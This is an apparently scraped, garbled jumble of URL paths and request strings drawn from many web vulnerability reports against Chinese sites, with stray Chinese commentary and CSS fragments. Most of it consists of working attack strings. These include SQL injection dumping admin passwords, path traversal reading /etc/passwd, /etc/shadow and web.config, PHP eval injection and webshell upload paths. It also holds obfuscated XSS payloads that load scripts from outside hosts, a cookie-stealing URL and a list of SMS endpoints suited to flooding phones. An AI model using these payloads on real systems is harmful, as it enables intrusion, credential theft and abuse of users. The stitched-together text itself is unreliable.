/cgi-bin/frame_html?sid=Gzq2rxVvs4qFYFEB&r=eb991f7152c691593231cdd294e2d9c3 //index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.php /down/class/index.php?myord=1 php:106 php:551 /v2/weather/city.php?pid=32 /jt//index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.php /UZH56T /zifei.php?tid=4423 /member/login.php write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,116,109,120,107,46,111,114,103,47,113,46,106,115,62,60,47,115,99,114,105,112,116,62))“ /Djlwz/tempuser/userregister.aspx /pin/sp/show/home?suid=98413539 void /zWiFcJh /footprint/trip/post/editsave / /jmx-console / /static/ /newLoginFull.q?callback=wooyun function() function(url,data,method,callback) function(url,callback) function(url,data,callback) 
/twAction/insertTwitter","msg=XSS&pics=%5B%7B%22url%22%3A%22http%3A%2F%2Fs2.t.itc.cn%2Fmblog%2Fpic%2F20127_26_13%2Fs_37750499540004660.png%5Cu0022%5Cu003E%5Cu003C%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu0020%5Cu0073%5Cu0072%5Cu0063%5Cu003D%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003A%5Cu002f%5Cu002f%5Cu0078%5Cu0073%5Cu0073%5Cu0065%5Cu0072%5Cu002e%5Cu006d%5Cu0065%5Cu002f%5Cu0055%5Cu005a%5Cu0048%5Cu0035%5Cu0036%5Cu0054%5Cu003E%5Cu003C%5Cu002f%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu003E%22%7D%5D",function(rs) /follow/addfollows","act=follow&friendids=299748820&uid=299748820",function(rs) /comment/8364dabba8236a6c06e03d11这个评论,某人发表“回应”后会在上面显示,对应一个reply_id。 /crossdomain.xml /celive/live/doajaxfileupload.php /celive/uploadfiles/CELIVE-2vOWcBQMQR.php /crmportal/Board/NewForm.aspx?categoryid=%7BDE1B01BE-5880-41B5-8E3D-D3B72F4BD4D4%7D /self/login.aspx www.gwbnsh.net.cn /self/login.aspx http://sh.centanet.com:80/wsmd/Default.aspx?mkt= /search/user?ageType=4&searchType=user&gender= /hope/live/scoreboard.php?match_id=2011_hope_13&rnd_num=1 /creditcard/view/vPointsearch.php?point_type=家居日用 /zhcx/zhcxAction!query.dhtml /stcms_html/member/u.php?action=list&where={sql /templates/download.jsp?path=/UserFiles/../templates/download.jsp /templates/download.jsp?path=/UserFiles/../templates/download.jsp /upload.do /upload.do /upload.do /upload.do /bugs/wooyun-2012-010172相同 /down/class/index.php?myord=1 php:105 php:551 /hotelsearch/hotelinfo.action /install/check.php return /sysadmin/Login.Asp?act=Check /chat/AdminMain.aspx /index.php?id=1'%20and%201%3C%3Ebenchmark(3000000,md5('wooyun'))%20and%20'a'='a /story.php?id=3049 /zw/external/index.action /findNewMusic2012!loadCompetition.action /search/noresult/ /test/xiechuang/User/Login/ / /focus/admin/login.do / /luntan/ /build/tmp/.svn/entries /src/.svn/entries /src/Model/.svn/entries /src/Controller/.svn/entries /src/Controller/Events/.svn/entries / /snjyw/ /snjyw/login.jsp /User/Passport/registerStep2?username= 
/user/aspasp /loginPage.html?type=1&bdPayUrl=http://www.wooyun.org /loginPage.html?type=1&bdPayUrl=javascript:alert%28%22test%22%29 /fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector money=还有表单的hidden多了几个参数。 /Shopping/OrderDetail.aspx?OrderCode=2012072978871 /m.php / /sqlnet.log /test.php /info.php /test.php /pp.php /about/admin4ppscms/index.php /index.php?act=admin%2Fhome%2Flogin /ray.php /m.php?act=login_do /html/ordershow.php?languages=tw&oid=31286163 / / /main/login.jsp /test.php /index.php?act=home/a_q /.svn/text-base/config.php.svn-base /.svn/entries /index/shop.action / /auth/index /auth/index /auth/index /auth/login?type=1 /Client/MyAddress.aspx /CallBack/UserCenterCallBack.ashx intitle:系统错误 /fleanew/editor.php?z_id=186400 /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php /servmanage/serviceInfo.action?serviceid=100&type=user / / /051000004EFB666B67585703060E72A2?qq445060535-url=q395885789q.googlecode.com/svn/trunk/av/cmp.swf?lists=av1/22.xml&.swf /type_14.html /venue/tips?guid=5842A4B18F5F1B3C&page=2 / /plus/ /admin/admin_login.php /(S(vzljsrplzvug5hb25w2ofckd))/js_cxxs.aspx?xh= /bid/51061/info /note/?ac=note&op=del /?m=mysqlmng&a=pma&app_id=应用名 /zh-CN/app/search/dashboard_live /huntjob/nresume/create.do?type=1&language=1会不断的创建新的简历,并且会返回简历的编号RESUME值。 / /info.php /server-status /xss/probe.js /360doc.rar /subject/index.php?id=135 /65/1 / /225/193//129 / /login.jsp /index.php / /admin/login /login.php //html.php //test.php //config.php.bak /admin/index.action /login.action / /fckeditor/editor/filemanager/connectors/test.html /jsp/cpss/_accessory/ /www/ /index)存在struts命令执行漏洞,非root权限。 / /user/create此页面Struts远程执行漏洞 
content.jsp?urltype=news.NewsContentUrl&wbtreeid //cgi-bin/buyitem_present_yxb1?item_id=57&item_num=1 /space.php?uid=17345 /thread-2974-1-2.html /?q-12162.html /FAQ/ShowAnswer.asp?id=1153 /schedulingplatform/PlatformLogin/login.html /dict_show.php?sort=date&cate=0&keyword= /wap/index.php?c=down&a=content_all&id=26 /wap/?c=skin&a=platform&platform_type=s60v2 /wap/index.php?c=skin&a=info_gx&skin_id=153651&pos=3 /wap/index.php?c=dict /u06/upload/icon/ /YnzcAms/login.html?action=Jump www.tuita.com主域名下,因而要寻找该域名下的XSS。 /tagpage/wooyuntest /tagpage/wooyuntest /post/create /img/baidu_sylogo1.gif"onload="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116)) www.xiami.com\/widget\/0_376013\/singlePlayer.swf","song_id":"376013\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u003c\u0069\u006d\u0067\u002f\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0062\u0061\u0069\u0064\u0075\u002e\u0063\u006f\u006d\u002f\u0069\u006d\u0067\u002f\u0062\u0061\u0069\u0064\u0075\u005f\u0073\u0079\u006c\u006f\u0067\u006f\u0031\u002e\u0067\u0069\u0066\u0022\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0073\u003d\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0031\u0031\u0035\u002c\u0039\u0039\u002c\u0031\u0031\u0034\u002c\u0031\u0030\u0035\u002c\u0031\u0031\u0032\u002c\u0031\u0031\u0036\u0029\u0029\u003b\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0073\u002e\u0073\u0072\u0063\u003d\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0031\u0030\u0034\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0032\u002c\u0035\u0038\u002c\u0034\u0037\u002c\u0034\u0037\u002c\u0031\u003
0\u0035\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0035\u002c\u0031\u0031\u0031\u002c\u0031\u0030\u0037\u002c\u0031\u0030\u0038\u002c\u0039\u0037\u002c\u0034\u0036\u002c\u0031\u0030\u0030\u002c\u0031\u0031\u0037\u002c\u0039\u0037\u002c\u0031\u0031\u0032\u002c\u0031\u0031\u0032\u002c\u0034\u0036\u002c\u0039\u0039\u002c\u0031\u0031\u0031\u002c\u0031\u0030\u0039\u002c\u0034\u0037\u002c\u0031\u0030\u0036\u002c\u0034\u0036\u002c\u0031\u0030\u0036\u002c\u0031\u0031\u0035\u0029\u003b\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0043\u0068\u0069\u006c\u0064\u0028\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0073\u0029\u0022\u003e\u003c\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u003c\u0069\u0020\u0061\u003d\u0022","song_name":"\u56ed\u6e38\u4f1a","artist_id":"\u5468\u6770\u4f26","album_name":"\u4e03\u91cc\u9999","album_logo":{"55":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_3.jpg","100":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_1.jpg","185":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_2.jpg","300":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_4.jpg"},"audio_info":{"album_logo":null,"description /tagpage/wooyuntest /tagpage/wooyuntest /tagpage/test none / /tagpage/test中的恶意代码内容 /tagpage/test none /pkav.js www.tuita.com 
/post/create","post_title=%E5%9B%AD%E6%B8%B8%E4%BC%9A&post_content=%7B%22PlayerFlashVar%22%3A%22http%3A%5C%2F%5C%2Fwww.xiami.com%5C%2Fwidget%5C%2F0_376013%5C%2FsinglePlayer.swf%22%2C%22song_id%22%3A%22376013%5Cu0022%5Cu003e%5Cu003c%5Cu002f%5Cu006f%5Cu0062%5Cu006a%5Cu0065%5Cu0063%5Cu0074%5Cu003e%5Cu003c%5Cu0069%5Cu006d%5Cu0067%5Cu002f%5Cu0073%5Cu0072%5Cu0063%5Cu003d%5Cu0022%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003a%5Cu002f%5Cu002f%5Cu0077%5Cu0077%5Cu0077%5Cu002e%5Cu0062%5Cu0061%5Cu0069%5Cu0064%5Cu0075%5Cu002e%5Cu0063%5Cu006f%5Cu006d%5Cu002f%5Cu0069%5Cu006d%5Cu0067%5Cu002f%5Cu0062%5Cu0061%5Cu0069%5Cu0064%5Cu0075%5Cu005f%5Cu0073%5Cu0079%5Cu006c%5Cu006f%5Cu0067%5Cu006f%5Cu0031%5Cu002e%5Cu0067%5Cu0069%5Cu0066%5Cu0022%5Cu006f%5Cu006e%5Cu006c%5Cu006f%5Cu0061%5Cu0064%5Cu003d%5Cu0022%5Cu0077%5Cu0069%5Cu006e%5Cu0064%5Cu006f%5Cu0077%5Cu002e%5Cu0073%5Cu003d%5Cu0064%5Cu006f%5Cu0063%5Cu0075%5Cu006d%5Cu0065%5Cu006e%5Cu0074%5Cu002e%5Cu0063%5Cu0072%5Cu0065%5Cu0061%5Cu0074%5Cu0065%5Cu0045%5Cu006c%5Cu0065%5Cu006d%5Cu0065%5Cu006e%5Cu0074%5Cu0028%5Cu0053%5Cu0074%5Cu0072%5Cu0069%5Cu006e%5Cu0067%5Cu002e%5Cu0066%5Cu0072%5Cu006f%5Cu006d%5Cu0043%5Cu0068%5Cu0061%5Cu0072%5Cu0043%5Cu006f%5Cu0064%5Cu0065%5Cu0028%5Cu0031%5Cu0031%5Cu0035%5Cu002c%5Cu0039%5Cu0039%5Cu002c%5Cu0031%5Cu0031%5Cu0034%5Cu002c%5Cu0031%5Cu0030%5Cu0035%5Cu002c%5Cu0031%5Cu0031%5Cu0032%5Cu002c%5Cu0031%5Cu0031%5Cu0036%5Cu0029%5Cu0029%5Cu003b%5Cu0077%5Cu0069%5Cu006e%5Cu0064%5Cu006f%5Cu0077%5Cu002e%5Cu0073%5Cu002e%5Cu0073%5Cu0072%5Cu0063%5Cu003d%5Cu0053%5Cu0074%5Cu0072%5Cu0069%5Cu006e%5Cu0067%5Cu002e%5Cu0066%5Cu0072%5Cu006f%5Cu006d%5Cu0043%5Cu0068%5Cu0061%5Cu0072%5Cu0043%5Cu006f%5Cu0064%5Cu0065%5Cu0028%5Cu0031%5Cu0030%5Cu0034%5Cu002c%5Cu0031%5Cu0031%5Cu0036%5Cu002c%5Cu0031%5Cu0031%5Cu0036%5Cu002c%5Cu0031%5Cu0031%5Cu0032%5Cu002c%5Cu0035%5Cu0038%5Cu002c%5Cu0034%5Cu0037%5Cu002c%5Cu0034%5Cu0037%5Cu002c%5Cu0031%5Cu0030%5Cu0035%5Cu002c%5Cu0031%5Cu0031%5Cu0036%5Cu002c%5Cu0031%5Cu0031%5Cu0035%5Cu002c%5Cu0031%5Cu0031%5Cu0031%5Cu002c%5Cu0031%
5Cu0030%5Cu0037%5Cu002c%5Cu0031%5Cu0030%5Cu0038%5Cu002c%5Cu0039%5Cu0037%5Cu002c%5Cu0034%5Cu0036%5Cu002c%5Cu0031%5Cu0030%5Cu0030%5Cu002c%5Cu0031%5Cu0031%5Cu0037%5Cu002c%5Cu0039%5Cu0037%5Cu002c%5Cu0031%5Cu0031%5Cu0032%5Cu002c%5Cu0031%5Cu0031%5Cu0032%5Cu002c%5Cu0034%5Cu0036%5Cu002c%5Cu0039%5Cu0039%5Cu002c%5Cu0031%5Cu0031%5Cu0031%5Cu002c%5Cu0031%5Cu0030%5Cu0039%5Cu002c%5Cu0034%5Cu0037%5Cu002c%5Cu0031%5Cu0030%5Cu0036%5Cu002c%5Cu0034%5Cu0036%5Cu002c%5Cu0031%5Cu0030%5Cu0036%5Cu002c%5Cu0031%5Cu0031%5Cu0035%5Cu0029%5Cu003b%5Cu0064%5Cu006f%5Cu0063%5Cu0075%5Cu006d%5Cu0065%5Cu006e%5Cu0074%5Cu002e%5Cu0062%5Cu006f%5Cu0064%5Cu0079%5Cu002e%5Cu0061%5Cu0070%5Cu0070%5Cu0065%5Cu006e%5Cu0064%5Cu0043%5Cu0068%5Cu0069%5Cu006c%5Cu0064%5Cu0028%5Cu0077%5Cu0069%5Cu006e%5Cu0064%5Cu006f%5Cu0077%5Cu002e%5Cu0073%5Cu0029%5Cu0022%5Cu003e%5Cu003c%5Cu006f%5Cu0062%5Cu006a%5Cu0065%5Cu0063%5Cu0074%5Cu003e%5Cu003c%5Cu0069%5Cu0020%5Cu0061%5Cu003d%5Cu0022%22%2C%22song_name%22%3A%22%5Cu56ed%5Cu6e38%5Cu4f1a%22%2C%22artist_id%22%3A%22%5Cu5468%5Cu6770%5Cu4f26%22%2C%22album_name%22%3A%22%5Cu4e03%5Cu91cc%5Cu9999%22%2C%22album_logo%22%3A%7B%2255%22%3A%22http%3A%5C%2F%5C%2Fimg.xiami.com%5C%2F.%5C%2Fimages%5C%2Falbum%5C%2Fimg60%5C%2F1260%5C%2F66481314675280_3.jpg%22%2C%22100%22%3A%22http%3A%5C%2F%5C%2Fimg.xiami.com%5C%2F.%5C%2Fimages%5C%2Falbum%5C%2Fimg60%5C%2F1260%5C%2F66481314675280_1.jpg%22%2C%22185%22%3A%22http%3A%5C%2F%5C%2Fimg.xiami.com%5C%2F.%5C%2Fimages%5C%2Falbum%5C%2Fimg60%5C%2F1260%5C%2F66481314675280_2.jpg%22%2C%22300%22%3A%22http%3A%5C%2F%5C%2Fimg.xiami.com%5C%2F.%5C%2Fimages%5C%2Falbum%5C%2Fimg60%5C%2F1260%5C%2F66481314675280_4.jpg%22%7D%2C%22audio_info%22%3A%7B%22album_logo%22%3Anull%2C%22description%22%3A%22%3CP%3Eok%21+look%21%3C%5C%2FP%3E%22%7D%7D&post_type=xiami&blog_id="+id+"&sync_flag=0&syn=&post_tag=test&sticky=0&draft_id=451375&from=home&dtime=null",function(rs) /template/get?blog_id="+id+"&tsdump="+new /tagpage/test\ none\ 
/template/save","blog_id="+id+"&theme=0&custom_vars=%5B%7B%22name%22%3A%22%5Cu5c55%5Cu793a%5Cu5934%5Cu50cf%22%2C%22group%22%3A%22%5Cu8bbe%5Cu7f6e%22%2C%22type%22%3A%22boolean%22%2C%22value%22%3Atrue%2C%22reset%22%3Atrue%7D%2C%7B%22name%22%3A%22%5Cu5c55%5Cu793a%5Cu6211%5Cu5173%5Cu6ce8%5Cu7684%5Cu535a%5Cu5ba2%22%2C%22group%22%3A%22%5Cu8bbe%5Cu7f6e%22%2C%22type%22%3A%22boolean%22%2C%22value%22%3Atrue%2C%22reset%22%3Atrue%7D%2C%7B%22name%22%3A%22%5Cu5c55%5Cu793a%5Cu641c%5Cu7d22%5Cu6846%22%2C%22group%22%3A%22%5Cu8bbe%5Cu7f6e%22%2C%22type%22%3A%22boolean%22%2C%22value%22%3Atrue%2C%22reset%22%3Atrue%7D%5D&system_vars=%7B%22pagination_limit%22%3A%2210%22%7D&tpl_html="+encodeURIComponent(obj.data.tpl_html)+"&contribute_type=&contribute_tags=&contribute_rules=&contribute_save=1",function /home?hash="+Math.random(),function(rs) /util/keyword这个接口的数据,这个不是重点。 /post/edit /UZH56T /art/1099/20100111/1977341_1.html /3g/chatlog3g/42059/desc/3/page.do /3g/chatlog3g/42059/desc /register/commonRegisterNew.action /shop/greenWay/goGreenWay.action /topic/autocomplete?token=fb"nb'lh /autocomplete?token=fb"nb'lh /index.php?s=vod-search-area-${@print(eval($_POST[c])) /region/dljg/result.jsp?region_id=15 /zhxx/zhxxindex.jsp?id=null&gradeno=1 /cgfg/zywx.jsp?select1=2 /dsc/detaildscgg.jsp?fno=8 /dsc/detaildscdt.jsp?no=45 www.cqch.cn有个论坛,注册一个用户,然后发帖,可以看到一个上传热图,打开之后直接上传一个类似1.asp /cn/index/index.html /admin/Manage_backup.asp?action=Backup http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup-- 10px bold left /services/sendsms?username=%s /member/sendIdentityCodeByMobile.htm?callback=jQuery16404408283903978138_1329030748736&mobile=%s //ajax.php?action=getverify&mobile=%s /NoteAction.do?method=sendCode&mobile=%s&passwd= /Ashx/CreateMobileCode.ashx?mobile=%s& /Handler/Vcode.ashx?mobile=%s /ajax/json/account/reg/mobile/send?m=%s /?page=join&handler=ajax&action=send_reg_mobile_vcode&page_key=7ef0c64ccfeccd5cdda1306c3b769e1b&mobile_number=%s /gaea/SendPhoneMsg.ashx?page=REG&mobile=%s /3g/livelog/ 
/3g/livelog/42838/15/desc/0/1/page.do /3g/chatlog3g/42838/inputChat.do /mcolumn/expdetail.php?mid=890 /xiaoqu/block_details.php?bid=58 /HSH.mdb /user/login.asp /user/ /images/ /upload/ /upload/eWebEdit/ /upload/eWebEdit/db/yglEdit.mdb /login.html /mainpage.pr.prKeyWordLetViewlist.do?PageCond/length=20&WORDNAME=%BE%D9%B1%A8%25'%20and%201=1%20and%20'%25'= /mainpage.pr.prKeyWordLetViewlist.do?PageCond/length=20&WORDNAME=%BE%D9%B1%A8%25'%20and%201=2%20and%20'%25'= /index.php?artId=0&gname=1%27%22&r=gamesites/newslist /index.php?artId=0&gname=1%27%22&r=gamesites/newslist /eview.php?eid=8(不只这一个,自己找吧) /TR/xhtml1/DTD/xhtml1-transitional.dtd /1999/xhtml /services/sendsms?username=13800000000 /services/sendsms?username=手机号 /services/sendsms?username=13800000000 / /jmx-console /index.php?search-fulltext-title-%5C%22%3E%3Ciframe%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%3E--all-0-within-time-desc-1 /index.php?search-fulltext-title-%5C%22%3E%3Cscript%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%2Fq%26%2346%3Bjs%3E--all-0-within-time-desc-1 /index.php?search-fulltext-title-TAG%3A%5C%22%3E%5C%27%3E%3Ciframe%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%3E--all-0-within-time-desc-1 /index.php?doc-view-1572 /thread-625-1-1.html /search?q=intitle:powered+by+HDWiki /emall/city_10052_10051_9264_.html /tips/food/food.php?id=3701‘ /download?path=UserFiles/File/66dd5f26-8b7e-4d38-882d-147c50702604.doc /download?path=WEB-INF/web.xml /download?path=UserFiles/File/aa/../66dd5f26-8b7e-4d38-882d-147c50702604.doc /download?path=UserFiles/../WEB-INF/web.xml /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../../ /UserFiles/Image/shell.jsp /shell.jsp / /bugs/wooyun-2012-09469 / /admin/adminlogin.aspx / /admin/ALogin.aspx /Xiazai.aspx?xzURL=20111111125527aspxspy.aspx /Xiazai.aspx?xzURL=../web.config /CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config /images1/ /ddmapmanage/user!login.action /fbrole/main/login.jsp 
/interfaces/search/showSearchResult.action?searchKeywords=%3Cscript%3Ealert%28/xss/%29%3C/script%3E www.ons40.com /pay.php happigo.com uid /SCR2006/Courseware/NetDisk/5531/111026085064.php,执行的时候好像不能写php大马,写个asp上去就可以了。这个系统数据库用户用的是sa,有点。。 / /1937cN.txt /2894994/ /api/comment/delete/ /messages/211/ /messages/203/ /shop/shopNetCard.action /art/1099/20100111/1977341_1.html /admin-console/login.seam?conversationId=15 /index.php?m=Hotels&a=detail&id=6166 /c_513/#@ /20943.html /admin/system/codeigniter/cts.php tahoma,verdana,arial;font-size:11px;line-height:15px;background-color:white;color:#666666;margin-left:20px 12px none 20px;background:url("index.php?i=dots") 208;border:1 9pt FileChange(this.value) 60;border:1 9pt Database none /admin/jpg.asp Database Database Database Database tahoma,verdana,arial;font-size:11px;line-height:15px;background-color:white;color:#666666;margin-left:20px 12px none 20px;background:url("index.php?i=dots") 208;border:1 9pt FileChange(this.value) 60;border:1 9pt /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /273329/albums/ /273329/albums/277850/3361539/ /273329/albums/277850/3358396/ /store/page!login.action /mail/login.action /yl/news_info.php?uid=-64%20union%20select%201,2,3,4,concat%28user%28%29,0x2f,database%28%29,0x2f,version%28%29%29,6,7-- /assetmanager/ /assetmanager/HTMLEditor/Default.htm //image20010518/null/null/26833.txt /query/query_list.jsp?queryType=7 /5184cms/ /5184cms/conf/DatabasePool.conf /index.php/module/action/param1/$%7B@phpinfo%28%29%7D /content/detail.do /admin none none page www.moonhack.org / /test/.svn/entries /userinfo.php?id=3624 /front/supplier/advisoryshow.jsp?id=47075 /front/supplier/advisoryshow.jsp?id=47075 /front/supplier/advisoryshow.jsp?id=47075 /ckfinder/ckfinder.html /coupon/couponExchange.html /coupon/getCoupon_sendSms.html?mobile=手机号 /showNews!show.action?id=4028848a2a618bb6012cdd704b6b4f1b /Xss.swf#.mp3进行测试 /imgpro/editor/audio.gif /Xss.swf#.mp3 /imgpro/editor/audio.gif /Xss.swf"#.mp3 
/app/enter?appid=280383) /imgpro/editor/audio.gif /Xss.swf"#60;img/src=1 onerror=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,116,46,115,105,110,97,97,112,112,46,99,111,109,47,110,111,46,106,115);document.body.appendChild(window.s)})()>#.mp3 /imgpro/editor/audio.gif /Xss.swf" /Xss.swf"type="application/x-shockwave-flash" /tsingtao2012/index.php?url=admin/user /book/.svn/entries http://localhost:80/help/help.asp?id=1 /product/fir_cla.asp?flag=1&pro_claid=1 /search?selected=3&app_ref=search&origin=603&keyword= /crifs/content/docmanage/download.jsp?filePath=../../../../../../../../etc/passwd /wsbs/wsbg/wsjb_bjhdb2.jsp?bglsh=201207107970001225 /pay/ /Cruise/cruise_company?id=46 /Cruise/cruise_company?id=46‘ /snap.php?c='+document.cookie+ /278719/3383088/exif/ /index.php/crowdtest/uer/display/proid/736 /index.php/crowdtest/uer/display/proid/736 /index.php/crowdtest/uer/view/proid/745 /index.php/crowdtest/gift/exchange/type/3 / /story.php?story_list=&dr=&p=d%27z /kjbm/login.action /user/Login!loginInput.action / /pages/platform/addOrUpdatePlatform!add.action /member/signup/confirm_email_address/NjVkMDNlODItMjhmMC00N2NhLWE2YWYtOWNiYWU3NWFlNTZm /qq_piaoliuping_xss_code.txt /pkav.js g_docid},function(xml) /bmsite/listSub.action /order_pro_mody.asp?id=16125&ack=mody¤tpage=1074&Search_Domain_Name= / /news.aspx?nid=6 /guess/friends/list?url=http%3A%2F%2Fapps.2012.qq.com%2Fguess%2Fguess-tid-18-id-363&message=%E5%A5%B3%E7%AF%AE%E5%B0%8F%E7%BB%84%E8%B5%9B-%E4%B8%AD%E5%9B%BDvs%E5%AE%89%E5%93%A5%E6%8B%89%EF%BC%8C%E8%B0%81%E5%B0%86%E8%8E%B7%E8%83%9C%EF%BC%9F /guess/guess-tid-18-id-363 /guess/guess-tid-18-id-363 /guess/friends/invite?url=http%3A%2F%2Fapps.2012.qq.com%2Fguess%2Fguess-tid-18-id-363&hash=bc85ea9ed27178416dfe984ef58fb657 /guess/guess-tid-18-id-363 /guess/friends/list得到好友的QQ号码,token值,以及被邀请竞猜的URL以及URL对应的HASH值 /guess/guess-tid-18-id-363修改成我们自己的呢?于是我们测试,将url修改为 
/guess/friends/list?url=http%3A%2F%2Fapps.2012.qq.com%2Fguess%2Fguess-tid-18-id-363";alert(1)//&message=ok /#.qq.com/?http://1.qq.com一样可以发送成功。 /content/368),我就去腾讯的域名下找一个FLASH /aoyun_js.php.txt /aoyun_worm.js /aoyun_receive.php.txt / /fans123.php?mid=10183 admin /pma/ /icetea/list.php?special_sort_id=2 /stat.php?gid=33'&yid=yuku /pn/user_reg.php?tids=1&pid=1 /chbl/php/player.php?playerid=224 /client/200706suning/msg.php?id=34 /client/maybelline/work.php?img_id=230 /member/logout.jhtml?redirectURL=http://club.alimama.com/attachments/data/Day_120812/68_5263715_d06067053f2438d.txt?1BxS /go.php?id=3658 /login!register.action /index.do /xiarixinqing/login.do /register-intro.action /view/product/product!info.action /software!softlist.action /search /Index/print_plan?t_id=5568 /web/index.action?merchantId=4 /list.asp?id=7 / /Admin/index.php/Public/login /71/12397071.shtml /cgi-bin/login.cgi?action=log&fro=self&rand=0.6299977905582637 /tmp/updateme/sinfor/ad/sys/sys_user.conf /sjjg/bmjj.aspx?rid=20 /FCKeditor/editor/filemanager/browser/default/browser.html?Type=test&Connector=connectors/jsp/connector /upload/test/b/b.jsp /write.shtml?fid=367 http://www.k-touch.cn/product/detail?prod_id=20 /* / /news_about.php?cid=1&id=66%20and%201=2%20UNION%20SELECT%201,2,3,4,group_concat%28name,0x2b,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20admin /dz/uc_server /union/index.action /admin.php /connect_list.php?folder_id=105 /search?q=cache:SelKXWN73EYJ:zdzsc.zju.edu.cn/+&cd=1&hl=zh-CN&ct=clnk /lib.libone.action /s?q=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&pq=%3Cscript%3Ealert%28%22x%22%29%3C%2Fscript%3E&guid=1145750987453166300&src=srp /cms/e.php /novel/novel.asp?aid=7790 / /Web/Author/ProList.aspx?id=7 /ghc/editor/down.jsp?path=../../../../../../../etc&file=shadow /witkey/witkeylist/4/0-0-0--1%22%3E%3Cscript%3Ealert(123)%3C/script%3E /cps/membercenter/memberinfo.action /index.php /display.jsp?path=E:%5C /bscx.do?method=scurl&id=33108100003854 
/extra.php?mod=show/detail&postpicid=1306 /wp-includes/js/swfupload/swfupload.swf?movieName=%22 /wp-includes/js/swfupload/swfupload.swf?movieName=%22 /webhp?hl=zh-CN&sourceid=cnhp#hl=zh-CN&safe=strict&site=webhp&q=site:exam.htexam.com+filetype%3Aphp+-index&oq=site:exam.htexam.com+filetype%3Aphp+-index&gs_l=serp.3...4060.5308.10.6140.7.7.0.0.0.0.219.768.2j4j1.7.0...0.0...1c.Zs014furHmw&bav=on.2,or.r_gc.r_pw.r_cp.&fp=5bb8b75e73ae5f27&biw=1192&bih=655 /index/addLetter.action /approve/web/login/passwordView.jsp?loginName=深圳书城电子出版物有限责任公司 /extra.php?mod=xiaomi/authcallback&token=WVK%2B2L1CJlBAp3d%2BKsV1TRJ7bI3%2FwOoHIuJxDwud7LgQsq7b8k9%2B7Uj5Y6QSoe4RIgHVSwCZ5aA1gPIHXpSMWM98aqeMwbjSUJfH%2F5wTpt6yWDFessMgbMvdGmWtNX0Gjl2WhQW0ZsI6RostjdDwwCOXOh4tZGAPrrfZFbILUY3UCQxxRsERkVKV5EArNXToo73Hf3jESBCuplSrJxGkA0Cnd34qxXVNt2M2N6NzkW8611xTc9pg3%2FjgYo9ulmlE%2FJj9qKw%2FNRE%3D /extra.php?mod=xiaomi/authcallback&token=WVK%2B2L1CJlDTuCNhacHjkiQdbrGRf7So49fD99zudmbbUCwfv9QCR1sr7covSbBKPbUVHNdXCIP4oncO76xdTZbWw9YKLARR8nnGM2FKuwqlIK6U7uh2kxNqUZ3E5m5rOkaLLY3Q8MAjlzoeLWRgD6632RWyC1GN1AkMcUbBEZFSleRAKzV06KO9x394xEgQrqZUqycRpANbBolvHIw5j7djNjejc5FvOtdcU3PaYN9zYW2XuhDhCfyY%2FaisPzUR(本来这个我连挂了两天,结果被禁了) /index.php/crowdtest/uer/display/proid/763 / / /subdir/lndex.jsp /manager/lndex.jsp /cps/admin/login.action /fs/inquire/price_img.php /index.php/crowdtest/bug/displayBugList/?sEcho=1&iColumns=6&sColumns=&iDisplayStart=0&iDisplayLength=20&iSortingCols=1&iSortCol_0=2&sSortDir_0=desc&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=false&bug_sub_available=1&project_id=690 